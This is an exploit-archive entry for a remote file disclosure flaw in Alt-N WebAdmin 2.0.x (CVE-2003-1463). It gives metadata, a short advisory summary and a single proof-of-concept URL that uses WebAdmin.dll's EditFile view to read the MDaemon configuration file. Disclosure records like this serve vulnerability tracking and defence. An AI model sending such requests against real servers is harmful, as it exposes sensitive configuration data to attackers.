Alt-N WebAdmin 2.0.x - Remote File Disclosure

Author: david@kamborio.net
type: remote
platform: cgi
port: 
date_added: 2003-04-25 
date_updated: 2012-11-07 
verified: 1 
codes: CVE-2003-1463;OSVDB-53493 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7439/info

Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information.

http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile